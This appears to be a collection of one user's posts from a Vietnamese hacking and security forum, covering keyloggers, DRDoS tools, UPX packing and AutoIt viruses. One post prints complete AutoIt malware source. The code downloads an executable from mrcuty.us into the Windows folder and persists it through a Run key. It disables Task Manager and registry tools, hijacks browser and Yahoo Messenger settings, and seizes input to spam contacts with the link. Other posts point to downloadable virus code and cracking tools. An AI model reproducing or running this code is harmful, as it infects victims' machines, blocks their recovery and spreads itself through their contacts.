|
|
send cho bác luôn cái code lẫn em Foto http://www.mediafire.com/?hzondwdv2qj
www.xgroupvn.org
|
|
|
tool IGMP NuKe có thể thực hiện kiểu DRDOS trên
|
|
|
graycap wrote:
thử hỏi ông anh xem chăc ông ấy dùng netcut hoặc một cách nào đó vào máy bạn sau đó ông ấy muốn làm gì mà không được <dùng chung mang với người khác dễ tôi lắm>
netcut dùng trong mạng LAN ,công dụng thì ai cũng biết , không lẽ dùng netcut làm...keylog
|
|
|
sharkvn10 wrote:
có thể bị keylog,nhưng còn một trường hợp nữa mấy bạn bị theo giỏi,bởi môt phần mềm bot net nào đó...,nếu sai xin lượng thứ
botnet cao lắm thì chỉ screenshot thôi , việc thêm chức năng keylog thì chẳng bác nào rảnh rỗi làm theo kiểu ...cò con ấy đâu . Có thể người bị chôm mất pass do dùng chung tên user và pass khi đăng kí vào 1 forum mà forum đã bị ...hack--->...................
|
|
|
<đoán>
em này là sản phẩm của mr.CuTy ở Xgroup có tên Foto ( em này thuộc loại đã đi vào dĩ vãng nhưng các cụ Xgroup ....khai mồ quật mả lên tái chế !). Code của em này còn bên Xgroup , bác nào thích nghịch thì qua bên Xgroup mà tìm
</đoán>
|
|
|
rất tiếc là trong quá trình compile thì nó đã bị pack bởi UPX rồi
|
|
|
freeze_love wrote:
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi!
nhưng em thuộc loại ăn ớt không quen nên gặp khó khăn cũng nhiều anh ạ . Em biết là dân autoit "gộc" như ông anh cũng chán mấy cái vụ viết virus nên chuyển qua viết anti virus nhưng người ta cũng lỡ hỏi rồi thì trả lời 1 tiếng cho khỏi mất tình cảm
|
|
|
billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code
vậy bác thử run cái này xem thử coi nó có bị kill không
em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay
Code:
#NoTrayIcon
$website = "http://mrcuty.us/"
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")
Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
xin nói thêm , bác chịu khó vào lục trong cái folder cài autoit của bác thì thấy ngay cái UPX trong ấy đấy ( nếu bác có cài autoit )
|
|
|
không bị cheat thì đúng hơn
|
|
|
em nghe nói bác Quảng có cái máy có thể dịch 1 con virus ra code không biết có thật không nhỉ
|
|
|
có nước load bằng olly lên rồi ngồi ngâm thôi.Vả lại cái"antihack" (theo em hiểu) là "chống crack" , 1 việc bất khả thi. Đã gọi là khoá thì phải mở được , đã gọi là phần mềm thì phải chấp nhận bị crack ( Câu này nghe được của các bác REA)
|
|
|
không có syssafe mà là safesys.Còn bạn DaigiaIQ_Y2.1k muốn "phá băng" thì mấy cái tool thiếu gì , hình như bên xgroupvn.org có đấy, hay google cũng được. Viết virus thì autoit là sự lựa chọn dễ nhất theo cả nghĩa đen lẫn nghĩa bóng (dễ thành công cũng như dễ bị bóc lịch nếu bị túm gáy)
PS:Code của safesys có search google cũng chẳng thấy đâu, đừng tìm vô ích
|
|
|
nó pack bằng UPX thì lấy UPX unpack được không nhỉ anh freeze love
|
|
|
Có soft thực hiện DRDOS à ?
|
|
|
Lại bài viết về netcat , báo cáo với chủ topic là em thấy bài viết này quen quen
|
|
|
chắc ông anh mới dùng word à . xin lỗi , em không có ý gì , chỉ là đối với word thì lúc tạo ra 1 file word rỗng thì luôn là 11kb
|
|
|
only joking
|
|
|
dway16 wrote:
Cài lại win như bình thường. Cứ ra mua đĩa ở quán rồi về cài thôi. Chả sao cả. Mất mỗi file taskmgr.exe chả sao đâu!!
hic , cài win lại thì nói làm gì . ông anh thử copy taskmgr của máy khác vào system32 thử xem
|
|
|
thử cài firmware xem sao http://lqv77.com/forum/index.php?showtopic=440
|
|
|
đọc sơ qua bài viết thì em thấy ông anh lenamem1 nên sửa lại mấy cái từ "hok" cho đúng quy định của box . Còn với từ "nik" của ông anh thì ông anh muốn sửa hay không cũng được .Xin nói thêm là cái vấn đề mất mật khẩu của ông anh thì có liên quan tới newbugs à ?
|
|
|
chỉ có khái niệm tấn công bằng DRDOS . Hiện giờ chưa thấy bác nào đưa ra khái niệm chống DRDOS cả
|
|
|
thấy gì đâu
|
|
|
dway16 wrote:
"Tìm file autorun.ini rồi delete đi"
autorun.ini , Chúa ơi
|
|
|
khà khà , đúng thứ mình cần
PS : sao cái box của bác kienmanowar dạo này vắng vẻ thế
|
|
|
đúng là chủ đề nhạy cảm nên nhiều người phản đối
|
|
|
Gangster0100 wrote:
máy của em lúc khởi động vào đến màn hình logon win thì bị hiện ra 1 bảng lỗi ! xong hiện bảng logon ( cái này do viust chứ em ko để logon ) vào em dùng BKAv quét ra 1 lô viust nhưng khởi động lại máy thì BKav lại báo lỗi và vẫn bị như vậy !! ai có thể chỉ cho em cách tiêu diệt nó không ?
em nghĩ anh nên dùng AV khác hoặc gửi thêm thông tin
|
|